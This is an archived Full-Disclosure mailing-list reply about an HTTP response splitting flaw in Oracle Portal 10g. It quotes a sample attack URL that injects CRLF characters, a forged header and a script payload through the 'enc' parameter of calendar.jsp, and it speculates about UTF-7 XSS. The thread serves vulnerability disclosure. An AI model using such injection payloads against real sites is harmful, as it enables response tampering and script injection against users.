[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
From: "Brian Eaton" <eaton.lists () gmail ! com>
Date: 2006-12-20 18:55:09
Message-ID: 242a0a8f0612201055y7509a182ra63a070ae7583694 () mail ! gmail ! com
[Download RAW message or body]
On 12/20/06, putosoft softputo <hasecorp@hotmail.com> wrote:
> Oracle Portal/Applications HTTP Response Splitting
> --------------------------------------------------
>
> Sample:
>
> http://<target>/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
>
So they let the URL specify the content-encoding? They might be
vulnerable to XSS via UTF-7 as well.
Regards,
Brian
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic